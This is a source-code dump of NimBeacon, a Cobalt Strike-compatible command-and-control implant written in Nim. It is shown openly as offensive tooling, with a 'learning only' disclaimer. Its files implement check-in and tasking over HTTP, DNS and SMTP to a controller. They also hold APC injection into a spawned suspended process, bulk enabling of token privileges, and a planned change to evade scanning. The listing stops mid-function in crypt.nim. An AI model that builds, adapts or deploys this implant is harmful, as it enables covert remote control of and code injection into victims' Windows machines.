├── cmd
    ├── dns.nim
    ├── result.nim
    ├── cmd.nim
    ├── windows
    │   ├── network.nim
    │   ├── inject.nim
    │   ├── token.nim
    │   ├── job.nim
    │   ├── exec.nim
    │   ├── process.nim
    │   └── clr.nim
    ├── types.nim
    └── fs.nim
├── .gitignore
├── transport
    ├── protocol.nim
    ├── smtp.nim
    ├── http.nim
    └── dns.nim
├── beacon.nim
├── README.md
├── crypt.nim
├── utils.nim
├── meta.nim
├── config.nim
├── LICENSE
└── jquery.profile


/cmd/dns.nim:
--------------------------------------------------------------------------------
1 | import std/[os, strutils, sequtils, times, streams, endians, tables]
2 | import ../[utils, config]
3 | import types, result
4 | 
5 | proc dns_checkin(buf: var seq[byte], cmd: command_type) = 
6 |     # No need to handle this?
7 |     discard
8 | 
9 | register_command(CMD_TYPE_CHECKIN, dns_checkin)


--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
 1 | # General build artifacts
 2 | *.o
 3 | *.a
 4 | *.so
 5 | *.dll
 6 | *.dylib
 7 | 
 8 | # Executable files
 9 | *.exe
10 | 
11 | # Logs and databases
12 | *.log
13 | *.sql
14 | *.sqlite
15 | 
16 | # IDE and editor files
17 | .idea/
18 | .vscode/
19 | *.suo
20 | *.ntvs*
21 | *.njsproj
22 | *.sln
23 | *.sw*
24 | 
25 | # Temporary files
26 | *.tmp
27 | *.temp
28 | 


--------------------------------------------------------------------------------
/transport/protocol.nim:
--------------------------------------------------------------------------------
 1 | import ../[config, utils]
 2 | import ./[http, dns, smtp]
 3 | 
 4 | # output represents data is output of a command
 5 | # refactor: there is three purposes of send_request
 6 | # 1. get task: xxx_get
 7 | # 2. send task result: xxx_post
 8 | # 3. checkin
 9 | proc send_request*(data: seq[byte], output = false, checkin = false): seq[byte] =
10 |     case config.protocol
11 |     of "http://", "https://":
12 |         if output: return send_request_http_post(data)
13 |         else: return send_request_http_get(data)
14 |     of "dns://":
15 |         if output: return send_request_dns_post(data, post_result_prefix)
16 |         else: return send_request_dns_get(data)
17 |     of "smtp://":
18 |         if output: return send_request_smtp_post(data, smtp_callback_prefix)
19 |         if checkin: return send_request_smtp_post(data, smtp_metadata_prefix)
20 |         return send_request_smtp_get(data)
21 |     else:
22 |         dbg "[-] unknown protocol: " & config.protocol
23 |         return
24 | 


--------------------------------------------------------------------------------
/beacon.nim:
--------------------------------------------------------------------------------
 1 | import std/[times, os]
 2 | import ./[meta, config, utils]
 3 | import transport/protocol
 4 | import cmd/cmd
 5 | import winim
 6 | 
 7 | proc should_exit(): bool = false
 8 | 
 9 | proc checkin(): bool =
10 |     var meta_data = gen_metadata()
11 |     if meta_data.len == 0: 
12 |         dbg "[-] generate metadata failed"
13 |         return false
14 | 
15 |     for i in 1 .. check_in_max_retries:
16 |         dbg "[+] attempt check in " & $i
17 |         try:
18 |             discard send_request(meta_data, checkin=true)
19 |             return true
20 |         except CatchableError:
21 |             sleep(10*1000)
22 |     return false
23 | 
24 | proc beacon() =
25 |     let start_time = times.now()
26 |     dbg "[+] Started at: " & start_time.format("yyyy-MM-dd HH:mm:ss")
27 | 
28 |     if checkin(): dbg "[+] check in succeded"
29 |     else:
30 |         dbg("[-] failed to checkin")
31 |         quit(-1)
32 |     
33 |     # quit(0)
34 |     sleep(sleep_interval)
35 |     # read command and exe
36 |     while true:
37 |         if should_exit():
38 |             dbg "[+] should exit, quiiting..."
39 |             quit(1)
40 |         
41 |         pull_command_and_exec()
42 |         sleep(sleep_interval)
43 | 
44 | when isMainModule:
45 |     when not defined(release): 
46 |         dbg "[+] debug mode"
47 |     beacon()
48 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # NimBeacon
 2 | 
 3 | NimBeacon is a CobaltStrike stageless beacon implemented in Nim.
 4 | 
 5 | It have been tested on Windows 11 and Cobalt Strike 4.5.
 6 | 
 7 | Any contributions are welcome.
 8 | 
 9 | *This project is for learning purpose only. DO NOT USE IT ILLEGALLY.*
10 | 
11 | ## Compile
12 | 
13 | ```
14 | # install dependencies
15 | nimble install winim zippy nimcrypto checksums smtp
16 | 
17 | # compile release version
18 | nim c -d:release -d:ssl beacon.nim
19 | # compile debug version
20 | nim c -d:ssl beacon.nim
21 | ```
22 | 
23 | ## Articles
24 | - [使用 Nim 实现 CobaltStrike Beacon](https://xz.aliyun.com/news/18173)
25 | - [[原创]为 CobaltStrike 增加 SMTP Beacon](https://bbs.kanxue.com/thread-287457.htm)
26 | 
27 | ## Thanks
28 | Thanks to the following projects and articals:
29 | - [geacon_plus](https://github.com/Z3ratu1/geacon_plus)
30 | - [OffensiveNim](https://github.com/byt3bl33d3r/OffensiveNim)
31 | - [[原创]魔改CobaltStrike：命由己造（上）](https://bbs.kanxue.com/thread-267848.htm)
32 | - [CobaltStrike beacon二开指南](https://blog.z3ratu1.top/CobaltStrike%20beacon%E4%BA%8C%E5%BC%80%E6%8C%87%E5%8D%97.html)
33 | - [CS DNS beacon二次开发指北](https://blog.z3ratu1.top/CS%20DNS%20beacon%E4%BA%8C%E6%AC%A1%E5%BC%80%E5%8F%91%E6%8C%87%E5%8C%97.html)
34 | - [CobaltStrike逆向学习系列](https://mp.weixin.qq.com/mp/appmsgalbum?__biz=MzkxMTMxMjI2OQ==&action=getalbum&album_id=2174670809724747778&scene=173&from_msgid=2247483983&from_itemidx=1&count=3&nolastread=1#wechat_redirect)
35 | 
36 | ## TODO
37 | - [ ] Refactor code
38 | 
39 | Compatible with Cobalt Strike 4.5:
40 | - [ ] Implement more commands
41 | - [x] Support DNS
42 | - [ ] Support linux and macOS
43 | 
44 | Some new features may require patches in Cobalt Strike
45 | - [ ] Remove checksum8 and others to evade scanning
46 | - [ ] Implement new commands
47 | - [x] Implement smtp protocal
48 | - [ ] Implement other protocols (e.g. Github?)
49 | 


--------------------------------------------------------------------------------
/cmd/result.nim:
--------------------------------------------------------------------------------
 1 | import std/[endians, locks]
 2 | import ../[crypt, utils, config]
 3 | import ../transport/protocol
 4 | import ./types
 5 | 
 6 | var packet_counter = 0
 7 | var pakcetLock: Lock
 8 | initLock pakcetLock
 9 | 
10 | proc make_packet(cb: callback_type, data: seq[byte]): seq[byte] =
11 |     var buf: seq[byte]
12 |     
13 |     packet_counter += 1
14 |     var temp4: array[4, byte]
15 |     bigEndian32(addr temp4, addr packet_counter)
16 |     buf.add(temp4)
17 | 
18 |     if data.len != 0:
19 |         var total_len = data.len + 4
20 |         bigEndian32(addr temp4, addr total_len)
21 |         buf.add(temp4)
22 |     
23 |     bigEndian32(addr temp4, addr cb)
24 |     buf.add(temp4)
25 | 
26 |     buf.add(data)
27 | 
28 |     # encrypt and hash, TODO DNS
29 |     var encrypted = aes_encrypt(buf)
30 |     when config.protocol != "dns://" and config.protocol!= "smtp://":
31 |         var total_len = encrypted.len + 16
32 |         bigEndian32(addr temp4, addr total_len)
33 |         result.add(temp4)
34 |     result.add(encrypted)
35 |     result.add(hmac_hash(encrypted))
36 | 
37 | proc push_result*(cb: callback_type, data: seq[byte]) =
38 |     # todo encode CALLBACK_OUTPUT to utf8
39 |     # if cb == CALLBACK_OUTPUT:
40 |     #     var utf8bytes = codepage_to_utf8_native(data)
41 |     #     if utf8bytes.len != 0: data = utf8bytes
42 | 
43 |     withLock pakcetLock:
44 |         var packet = make_packet(cb, data)
45 |         discard send_request(packet, output = true)
46 | 
47 | proc push_error*(err: string) =
48 |     dbg "[-] error: " & err
49 | 
50 |     var packet: seq[byte]
51 |     var temp4: array[4, byte]
52 |     var err_id, arg1, arg2 = 0.int32
53 |     bigEndian32(addr temp4, addr err_id)
54 |     packet.add(temp4)
55 |     bigEndian32(addr temp4, addr arg1)
56 |     packet.add(temp4)
57 |     bigEndian32(addr temp4, addr arg2)
58 |     packet.add(temp4)
59 |     packet.add(err.toSeq)
60 |     push_result(CALLBACK_ERROR, packet)


--------------------------------------------------------------------------------
/cmd/cmd.nim:
--------------------------------------------------------------------------------
 1 | import std/[endians, tables]
 2 | import ../[meta, config, utils, crypt]
 3 | import ../transport/protocol
 4 | import types, fs, dns
 5 | when defined(windows):
 6 |     import windows/[process, exec, inject, job, clr, token, network]
 7 | 
 8 | proc pull_command_and_exec*() =
 9 |     var resp = send_request(meta_info_enc)
10 |     if resp.len == 0: return
11 | 
12 |     # verify hamc hash
13 |     var hmac_hash = resp[resp.len-hmac_key.len..<resp.len]
14 |     if not verify_hmac_hash(hmac_hash): return
15 |     var payload = resp[0..<resp.len-hmac_key.len]
16 |     payload = aes_decrypt(payload)
17 |     dbg "[+] payload: " & repr(payload)
18 | 
19 |     var timestamp = payload[0..<4]
20 |     var temp4: array[4, byte]
21 |     for i in 0..<4: temp4[i] = payload[4+i]
22 |     var packet_len: int32
23 |     bigEndian32(addr packet_len, addr temp4)
24 |     var packet_buf = payload[8..^1]
25 |     
26 |     # parse cmd from packet
27 |     while packet_len > 0:
28 |         for i in 0..<4: temp4[i] = packet_buf[i]
29 |         var cmd_type: command_type
30 |         bigEndian32(addr cmd_type, addr temp4)
31 | 
32 |         for i in 0..<4: temp4[i] = packet_buf[4+i]
33 |         var cmd_len: int32
34 |         bigEndian32(addr cmd_len, addr temp4)
35 | 
36 |         var cmd_buf: seq[byte]
37 |         #for i in 8..<packet_len: cmd_buf.add(packet_buf[i])
38 |         dbg "[+] packet buf: " & repr(packet_buf) & "\n\tlen: " & repr(packet_buf.len)
39 |         for i in 8..<8+cmd_len: cmd_buf.add(packet_buf[i])
40 | 
41 |         dbg "[+] command type: " & repr(cmd_type) & " - " & $cmd_len &
42 |             "\n\tbuf in string: " & cmd_buf.toString &
43 |             "\n\tbuf in bytes: " & repr(cmd_buf)
44 | 
45 |         if command_table.hasKey(cmd_type):
46 |             command_table[cmd_type](cmd_buf, cmd_type)
47 |         else:
48 |             dbg "[-] couldn't find command: " & repr(cmd_type)
49 | 
50 |         packet_len -= cmd_len + 8
51 |         packet_buf = packet_buf[cmd_len+8..^1]


--------------------------------------------------------------------------------
/cmd/windows/network.nim:
--------------------------------------------------------------------------------
 1 | import ../../[utils, config]
 2 | import ../[types, result]
 3 | import winim
 4 | import winim/inc/iphlpapi
 5 | 
 6 | ## todo, not implemented
 7 | # proc ifconfig(buf: var seq[byte], cmd: command_type) =
 8 | #     dbg "[+] ifconfig"
 9 | #     var buf_len = 0.ULONG
10 | #     var err = GetAdaptersAddresses(AF_UNSPEC, GAA_FLAG_INCLUDE_PREFIX, nil, nil, &buf_len)
11 | #     if err != ERROR_BUFFER_OVERFLOW:
12 | #         dbg "[-] GetAdaptersAddresses failed: " & $err
13 | #         return
14 | #     var adapters = cast[PIP_ADAPTER_ADDRESSES](alloc(buf_len))
15 | #     defer: dealloc(adapters)
16 | #     err = GetAdaptersAddresses(AF_UNSPEC, GAA_FLAG_INCLUDE_PREFIX, nil, adapters, &buf_len)
17 | #     if err != ERROR_SUCCESS:
18 | #         dbg "[-] GetAdaptersAddresses failed: " & $err
19 | #         return
20 | 
21 | #     var res_str = ""
22 | #     var adapter = adapters
23 | #     while adapter != NULL:
24 | #         if adapter.PhysicalAddressLength != 6: 
25 | #             adapter = adapter.Next
26 | #             continue
27 | #         var unicast = adapter.FirstUnicastAddress
28 | #         while unicast != NULL:
29 | #             if unicast.Address.lpSockaddr.sa_family != AF_INET:
30 | #                 unicast = unicast.Next
31 | #                 continue
32 | 
33 | #             var ip_str: array[46, WCHAR]
34 | #             var ip_addr = cast[LPSOCKADDRIN](unicast.Address.lpSockaddr)
35 | #             InetNtop(AF_INET, &(ip_addr.sin_addr), &ip_str[0], sizeof(ip_str))
36 | #             dbg "[+] IP: " & $ip_str & " - " & $adapter.FriendlyName
37 | 
38 | #             # var mask: ULONG
39 | #             # var mask_str: array[16, WCHAR]
40 | #             # if ConvertLengthToIpv4Mask(unicast.PrefixLength, &mask) != NO_ERROR:
41 | #             #     dbg "[-] ConvertLengthToIpv4Mask failed: " & $GetLastError()
42 | #             #     return        
43 | #             # dbg "[+] Mask: " & $mask_str
44 | 
45 | #             # var mac_str: array[18, WCHAR]
46 | #             # MacToStr(adapter.PhysicalAddress, &mac_str[0], sizeof(mac_str))
47 | #         adapter = adapter.Next
48 | 
49 | # register_command(CMD_TYPE_LIST_NETWORK, ifconfig)


--------------------------------------------------------------------------------
/cmd/windows/inject.nim:
--------------------------------------------------------------------------------
 1 | import ../../[utils, config]
 2 | import ../[types]
 3 | import winim
 4 | import winim/[lean, winstr]
 5 | import winim/inc/winbase
 6 | import std/[strutils]
 7 | import exec
 8 | 
 9 | var last_spawned*: PROCESS_INFORMATION
10 | 
11 | proc inject_temp_process(dll: seq[byte], dll_x64, use_token: bool) =
12 |     # only implemented apc injection
13 |     when inject_method == "a":
14 |         # 1. create suspended process
15 |         # todo, judge if process x64 and if spawn_to_x64 is the only word
16 |         var app = config.spawn_to_x64.replace("sysnative", "system32")
17 |         var args = ""
18 |         var pi = create_process(app, args, false, use_token, true)
19 |         if pi.hProcess == 0:
20 |             dbg "[-] CreateProcess failed: " & $GetLastError()
21 |             return
22 |         last_spawned = pi    
23 | 
24 |         # 2. allocate memory in target process and write dll content
25 |         var bytesWritten, old_protect: DWORD = 0
26 |         var target_addr = VirtualAllocEx(pi.hProcess, nil, dll.len, MEM_COMMIT.DWORD, PAGE_READWRITE.DWORD)
27 |         if target_addr == nil:
28 |             dbg "[-] VirtualAllocEx failed: " & $GetLastError()
29 |             return
30 |         if WriteProcessMemory(pi.hProcess, target_addr, dll[0].addr, dll.len, nil) == 0:
31 |             dbg "[-] WriteProcessMemory failed: " & $GetLastError()
32 |             return
33 |         if VirtualProtectEx(pi.hProcess, target_addr, dll.len, PAGE_EXECUTE_READ.DWORD, &old_protect) == 0:
34 |             dbg "[-] VirtualProtectEx failed: " & $GetLastError()
35 |             return
36 | 
37 |         # 3. inject an APC and resume thread
38 |         if QueueUserAPC(cast[PAPCFUNC](target_addr), pi.hThread, 0) == 0:
39 |             dbg "[-] QueueUserAPC failed: " & $GetLastError()
40 |             return
41 |         if ResumeThread(pi.hThread) == -1:
42 |             dbg "[-] ResumeThread failed: " & $GetLastError()
43 |             return
44 | 
45 | proc inject_self(dll: seq[byte], dll_x64, use_token: bool) =
46 |     discard
47 | 
48 | proc spawn_and_inject(buf: var seq[byte], cmd: command_type) =
49 |     var use_token, dll_x64: bool
50 |     case cmd
51 |     of CMD_TYPE_SPAWN_TOKEN_X64:
52 |         use_token = true
53 |         dll_x64 = true
54 |     of CMD_TYPE_SPAWN_TOKEN_X86:
55 |         use_token = true
56 |         dll_x64 = false
57 |     of CMD_TYPE_SPAWN_IGNORE_TOKEN_X64:
58 |         use_token = false
59 |         dll_x64 = true
60 |     of CMD_TYPE_SPAWN_IGNORE_TOKEN_X86:
61 |         use_token = false
62 |         dll_x64 = false
63 |     else:
64 |         return
65 | 
66 |     when not inject_self:
67 |         inject_temp_process(buf, dll_x64, use_token)
68 |     else:
69 |         inject_self(buf, dll_x64, use_token)
70 | 
71 | register_command(CMD_TYPE_SPAWN_TOKEN_X64, spawn_and_inject)
72 | register_command(CMD_TYPE_SPAWN_TOKEN_X86, spawn_and_inject)
73 | register_command(CMD_TYPE_SPAWN_IGNORE_TOKEN_X64, spawn_and_inject)
74 | register_command(CMD_TYPE_SPAWN_IGNORE_TOKEN_X86, spawn_and_inject)
75 | 


--------------------------------------------------------------------------------
/cmd/windows/token.nim:
--------------------------------------------------------------------------------
 1 | import std/[endians, sequtils, strutils, strformat]
 2 | import ../../[utils, config]
 3 | import ../[types, result]
 4 | import winim
 5 | import winim/inc/winbase
 6 | 
 7 | var stolen_token*: HANDLE
 8 | var token_valid* = false
 9 | var priv_list = [
10 |     SE_ASSIGNPRIMARYTOKEN_NAME,
11 |     SE_AUDIT_NAME,
12 |     SE_BACKUP_NAME,
13 |     SE_CHANGE_NOTIFY_NAME,
14 |     SE_CREATE_GLOBAL_NAME,
15 |     SE_CREATE_PAGEFILE_NAME,
16 |     SE_CREATE_PERMANENT_NAME,
17 |     SE_CREATE_SYMBOLIC_LINK_NAME,
18 |     SE_CREATE_TOKEN_NAME,
19 |     SE_DEBUG_NAME,
20 |     # not defined in winim
21 |     # SE_DELEGATE_SESSION_USER_IMPERSONATE_NAME,
22 |     SE_ENABLE_DELEGATION_NAME,
23 |     SE_IMPERSONATE_NAME,
24 |     SE_INC_BASE_PRIORITY_NAME,
25 |     SE_INCREASE_QUOTA_NAME,
26 |     SE_INC_WORKING_SET_NAME,
27 |     SE_LOAD_DRIVER_NAME,
28 |     SE_LOCK_MEMORY_NAME,
29 |     SE_MACHINE_ACCOUNT_NAME,
30 |     SE_MANAGE_VOLUME_NAME,
31 |     SE_PROF_SINGLE_PROCESS_NAME,
32 |     SE_RELABEL_NAME,
33 |     SE_REMOTE_SHUTDOWN_NAME,
34 |     SE_RESTORE_NAME,
35 |     SE_SECURITY_NAME,
36 |     SE_SHUTDOWN_NAME,
37 |     SE_SYNC_AGENT_NAME,
38 |     SE_SYSTEM_ENVIRONMENT_NAME,
39 |     SE_SYSTEM_PROFILE_NAME,
40 |     SE_SYSTEMTIME_NAME,
41 |     SE_TAKE_OWNERSHIP_NAME,
42 |     SE_TCB_NAME,
43 |     SE_TIME_ZONE_NAME,
44 |     SE_TRUSTED_CREDMAN_ACCESS_NAME,
45 |     SE_UNDOCK_NAME,
46 |     SE_UNSOLICITED_INPUT_NAME,
47 | ]
48 | 
49 | proc get_privs_internal(privs: var seq[string]): string =
50 |     var token: HANDLE
51 |     if token_valid:
52 |         token = stolen_token
53 |     else:
54 |         if OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES or TOKEN_QUERY, &token) == 0:
55 |             return "[-] OpenProcessToken failed: " & $GetLastError()
56 |         return
57 | 
58 |     var luids: seq[LUID]
59 |     for priv in privs:
60 |         var luid: LUID
61 |         if LookupPrivilegeValueW(nil, winstrConverterStringToLPWSTR(priv), &luid) == 0:
62 |             return "[-] LookupPrivilegeValueW failed: " & $GetLastError()
63 |         luids.add(luid)
64 | 
65 |     for i in 0..<luids.len:
66 |         var l = luids[i]
67 |         var la: LUID_AND_ATTRIBUTES
68 |         la.LUID = l
69 |         la.Attributes = SE_PRIVILEGE_ENABLED
70 |         var tp: TOKEN_PRIVILEGES
71 |         tp.PrivilegeCount = 1
72 |         tp.Privileges[0] = la
73 |         if AdjustTokenPrivileges(token, 0, &tp, 0, nil, nil) == 0:
74 |             return &"[-] AdjustTokenPrivileges failed: {$GetLastError()}" 
75 |         else:
76 |             result = result & $privs[i] & "\n"
77 | 
78 | proc get_privs(buf: var seq[byte], cmd: command_type) =
79 |     var cnt = parse_int16(buf)
80 |     var args = parse_multiple(buf, cnt)
81 |     var privs: seq[string]
82 |     for i in 0..<cnt: privs.add(args[i].to_string())
83 |     push_result(CALLBACK_OUTPUT, get_privs_internal(privs).toSeq)
84 | 
85 | proc revert_to_self(buf: var seq[byte], cmd: command_type) = 
86 |     CloseHandle(stolen_token)
87 |     RevertToSelf()
88 | 
89 | # proc steal_token(buf: var seq[byte], cmd: command_type)
90 | 
91 | # proc make_token(buf: var seq[byte], cmd: command_type)
92 | 
93 | # proc run_as(buf: var seq[byte], cmd: command_type)
94 | 
95 | register_command(CMD_TYPE_GET_PRIVS, get_privs)
96 | register_command(CMD_TYPE_REV2SELF, revert_to_self)


--------------------------------------------------------------------------------
/transport/smtp.nim:
--------------------------------------------------------------------------------
  1 | import ../[config, utils, meta]
  2 | import std/[strutils, random, strformat, base64, os, endians, net]
  3 | 
  4 | proc send_request_smtp_post*(data: seq[byte], prefix: string): seq[byte] =
  5 |     var socket = dial(config.host, parseInt(config.port).Port)
  6 |     var resp = socket.recvLine()
  7 |     if not resp.startsWith("220"):
  8 |         dbg "[-] failed to connect to server, resp: " & resp
  9 |         return 
 10 | 
 11 |     socket.send(&"HELO {smtp_client_name}\r\n")
 12 |     resp = socket.recvLine()
 13 |     if not resp.startsWith("250"):
 14 |         dbg "[-] failed to send HELO command, resp: " & resp
 15 |         return
 16 | 
 17 |     socket.send(&"MAIL FROM: <{beacon_id.toHex(8)}@{smtp_from_base_domain}>\r\n")
 18 |     resp = socket.recvLine()
 19 |     if not resp.startsWith("250"):
 20 |         dbg "[-] failed to send MAIL FROM command, resp: " & resp
 21 |         return
 22 | 
 23 |     socket.send(&"RCPT TO: <{smtp_to_user}>\r\n")
 24 |     resp = socket.recvLine()
 25 |     if not resp.startsWith("250"):
 26 |         dbg "[-] failed to send RCPT TO command, resp: " & resp
 27 |         return
 28 | 
 29 |     socket.send(&"DATA\r\n")
 30 |     resp = socket.recvLine()
 31 |     if not resp.startsWith("354"):
 32 |         dbg "[-] failed to send DATA command, resp: " & resp
 33 |         return
 34 | 
 35 |     socket.send(smtp_data_prefix & prefix & data.toString.toHex & smtp_data_suffix & "\r\n.\r\n")
 36 |     resp = socket.recvLine()
 37 |     if not resp.startsWith("250"):
 38 |         dbg "[-] failed to send DATA command, resp: " & resp
 39 |         return
 40 | 
 41 |     socket.send(&"QUIT\r\n")
 42 |     resp = socket.recvLine()
 43 |     if not resp.startsWith("221"):
 44 |         dbg "[-] failed to send QUIT command, resp: " & resp
 45 |         return
 46 |     socket.close()
 47 |     return
 48 | 
 49 | proc send_request_smtp_get*(data: seq[byte]): seq[byte] =
 50 |     var socket = dial(config.host, parseInt(config.port).Port)
 51 |     var resp = socket.recvLine()
 52 |     if not resp.startsWith("220"):
 53 |         dbg "[-] failed to connect to server, resp: " & resp
 54 |         return 
 55 | 
 56 |     socket.send(&"HELO {smtp_client_name}\r\n")
 57 |     resp = socket.recvLine()
 58 |     if not resp.startsWith("250"):
 59 |         dbg "[-] failed to send HELO command, resp: " & resp
 60 |         return
 61 | 
 62 |     socket.send(&"MAIL FROM: <{beacon_id.toHex(8)}@{smtp_from_base_domain}>\r\n")
 63 |     resp = socket.recvLine()
 64 |     if not resp.startsWith("250"):
 65 |         dbg "[-] failed to send MAIL FROM command, resp: " & resp
 66 |         return
 67 | 
 68 |     socket.send(&"RCPT TO: <{smtp_to_user}>\r\n")
 69 |     resp = socket.recvLine()
 70 |     if not resp.startsWith("250"):
 71 |         dbg "[-] failed to send RCPT TO command, resp: " & resp
 72 |         return
 73 | 
 74 |     var res_str = ""
 75 |     while true:
 76 |         socket.send(&"NOOP\r\n")
 77 |         resp = socket.recvLine()
 78 |         if resp == smtp_noop_empty_response:
 79 |             break
 80 |         else:
 81 |             resp.removePrefix("250 ")
 82 |             resp.removePrefix(smtp_noop_prefix)
 83 |             resp.removeSuffix(smtp_noop_suffix)
 84 |             res_str = res_str & resp
 85 |             dbg "[*] recv NOOP response: " & resp
 86 |     result = parseHexStr(res_str).toSeq
 87 |     dbg "[*] recv task bytes: " & $result
 88 | 
 89 |     socket.send(&"DATA\r\n")
 90 |     resp = socket.recvLine()
 91 |     if not resp.startsWith("354"):
 92 |         dbg "[-] failed to send DATA command, resp: " & resp
 93 |         return
 94 | 
 95 |     socket.send(smtp_data_prefix & smtp_empty_data & smtp_data_suffix & "\r\n.\r\n")
 96 |     resp = socket.recvLine()
 97 |     if not resp.startsWith("250"):
 98 |         dbg "[-] failed to send DATA command, resp: " & resp
 99 |         return
100 | 
101 |     socket.send(&"QUIT\r\n")
102 |     resp = socket.recvLine()
103 |     if not resp.startsWith("221"):
104 |         dbg "[-] failed to send QUIT command, resp: " & resp
105 |         return
106 |     socket.close()
107 |     return


--------------------------------------------------------------------------------
/cmd/windows/job.nim:
--------------------------------------------------------------------------------
  1 | import std/[os, strutils, endians, tables, strformat]
  2 | import ../../[utils]
  3 | import ../[types, result]
  4 | import ./[inject, exec]
  5 | import winim
  6 | import winim/winstr
  7 | 
  8 | type Job = object
  9 |     job_id: int
 10 |     pid: int32
 11 |     handle: HANDLE
 12 |     description: string
 13 |     callback: callback_type
 14 |     pipe_name: string
 15 |     sleep_time: int32
 16 | 
 17 | var job_count = 0
 18 | var jobs: seq[Job]
 19 | proc remove_job(job_id: int)
 20 | 
 21 | proc check_job(job_id: int) =
 22 |     var found = false
 23 |     var job_id_to_remove = -1
 24 |     for j in jobs:
 25 |         if j.job_id != job_id: continue
 26 |         found = true
 27 | 
 28 |         var pipe = CreateFile(+$j.pipe_name, GENERIC_READ, 0, nil, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, INVALID_HANDLE_VALUE)
 29 |         if pipe == INVALID_HANDLE_VALUE:
 30 |             dbg "[-] CreateFile failed: " & $GetLastError()
 31 |             sleep(2000)
 32 |             pipe = CreateFile(+$j.pipe_name, GENERIC_READ, 0, nil, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, INVALID_HANDLE_VALUE)
 33 |             if pipe == INVALID_HANDLE_VALUE:
 34 |                 dbg "[-] CreateFile failed: " & $GetLastError()
 35 |                 continue
 36 |         loop_read(j.handle, pipe, j.callback)
 37 |         job_id_to_remove = j.job_id
 38 |         CloseHandle(pipe)
 39 |         CloseHandle(j.handle)
 40 |     if not found: dbg "[-] job not found: " & $job_id
 41 |     if job_id_to_remove != -1: remove_job(job_id_to_remove)
 42 | 
 43 | proc remove_job(job_id: int) =
 44 |     # disconnect pipe and remove job from jobs
 45 |     var index = -1
 46 |     for i in 0..<jobs.len:
 47 |         var j = jobs[i]
 48 |         if j.job_id == job_id:
 49 |             dbg fmt"[+] remove job: {j.job_id}, pid: {j.pid}, description: {j.description}, pipe_name: {j.pipe_name}, sleep_time: {j.sleep_time}"
 50 |             CloseHandle(j.handle)
 51 |             index = i
 52 |     if index != -1: jobs.delete(index)
 53 | 
 54 | proc add_job(buf: var seq[byte], cmd: command_type) = 
 55 |     var temp2: array[2, byte]
 56 | 
 57 |     # pid, no need
 58 |     buf = buf[4..<buf.len]
 59 | 
 60 |     # callback
 61 |     for i in 0..<2: temp2[i] = buf[i]
 62 |     var callback: callback_type
 63 |     bigEndian16(callback.addr, temp2.addr)
 64 |     buf = buf[2..<buf.len]
 65 | 
 66 |     # sleeptime
 67 |     for i in 0..<2: temp2[i] = buf[i]
 68 |     var sleep_time: int16
 69 |     bigEndian32(sleep_time.addr, temp2.addr)
 70 |     buf = buf[2..<buf.len]
 71 | 
 72 |     var args = parse_multiple(buf, 2)
 73 |     var pipe_name = args[0].toString
 74 |     var description = args[1].toString
 75 |     removeSuffix(pipe_name, "\x00")
 76 | 
 77 |     if last_spawned.dwProcessId == 0:
 78 |         dbg "[-] last spawned process is not valid"
 79 |         return
 80 | 
 81 |     var j = Job(
 82 |         job_id: job_count, 
 83 |         pid: last_spawned.dwProcessId, 
 84 |         handle: last_spawned.hThread, 
 85 |         description: description, 
 86 |         callback: callback, 
 87 |         pipe_name: pipe_name, 
 88 |         sleep_time: sleep_time
 89 |     )
 90 |     jobs.add(j)
 91 |     job_count += 1
 92 |     dbg fmt"[+] add job: {j.job_id}, pid: {j.pid}, description: {j.description}, pipe_name: {j.pipe_name}, sleep_time: {j.sleep_time}"
 93 |     # todo make this async
 94 |     check_job(j.job_id)
 95 | 
 96 | proc list_job(buf: var seq[byte], cmd: command_type) = 
 97 |     var res = ""
 98 |     for j in jobs:
 99 |         res = res & &"{j.job_id}\t{j.pid}\t{j.description}\n"
100 |     push_result(CALLBACK_LIST_JOBS, res.toSeq)  
101 | 
102 | proc kill_job(buf: var seq[byte], cmd: command_type) = 
103 |     var temp2: array[2, byte]
104 |     var job_id: int16
105 |     for i in 0..<2: temp2[i] = buf[i]
106 |     bigEndian16(job_id.addr, temp2.addr)
107 | 
108 |     for j in jobs:
109 |         if j.job_id == job_id:
110 |             dbg fmt"[+] kill job: {j.job_id}, pid: {j.pid}, description: {j.description}, pipe_name: {j.pipe_name}, sleep_time: {j.sleep_time}"
111 |             remove_job(j.job_id)
112 | 
113 | register_command(CMD_TYPE_JOB, add_job)
114 | register_command(CMD_TYPE_UNKNOWN_JOB, add_job)
115 | register_command(CMD_TYPE_LIST_JOBS, list_job)
116 | register_command(CMD_TYPE_JOBKILL, kill_job)


--------------------------------------------------------------------------------
/crypt.nim:
--------------------------------------------------------------------------------
  1 | import std/[random, sequtils, openssl]
  2 | import ./[config, utils]
  3 | import nimcrypto
  4 | import checksums/sha2
  5 | 
  6 | randomize()
  7 | var 
  8 |     global_key*: array[16, byte]
  9 |     global_key_hash*: array[32, byte]
 10 |     aes_key*: array[16, byte]
 11 |     hmac_key*: array[16, byte]
 12 | 
 13 | for i in 0..15: global_key[i] = rand(255).byte
 14 | var global_key_char: array[16, char]
 15 | for i in 0..<16: global_key_char[i] = global_key[i].char
 16 | var hasher = initSha_256()
 17 | hasher.update(global_key_char)
 18 | let digest = hasher.digest()
 19 | 
 20 | for i in 0..31: global_key_hash[i] = digest[i].byte
 21 | for i in 0..15: aes_key[i] = global_key_hash[i]
 22 | for i in 0..15: hmac_key[i] = global_key_hash[i+16]
 23 | dbg "[+] crypt initialized: \n\tglobal_key:" & repr(global_key) &
 24 |         "\n\tglobal_key_hash: " & repr(global_key_hash) &
 25 |         "\n\taes_key: " & repr(aes_key) &
 26 |         "\n\thmac_key: " & repr(hmac_key)
 27 | 
 28 | proc get_iv(): array[16, byte] = 
 29 |     for i in 0..15: result[i] = "abcdefghijklmnop"[i].byte
 30 | 
 31 | proc padding(data: var seq[byte], block_size: int) =
 32 |     var pad = 97.byte # 'A'
 33 |     while data.len mod block_size != 0:
 34 |         data.add(pad)
 35 | 
 36 | # See https://forum.nim-lang.org/t/8060
 37 | proc rsa_encrypt*(data: seq[byte]): seq[byte]=
 38 |     var plaintext = toString(data)
 39 |     var key = rsa_public_key
 40 |     var rsa_pub: PRSA
 41 |     var bio_pub = BIO_new_mem_buf(addr key[0], -1)
 42 |     rsa_pub = PEM_read_bio_RSA_PUBKEY(bio_pub, rsa_pub.addr, nil, nil)
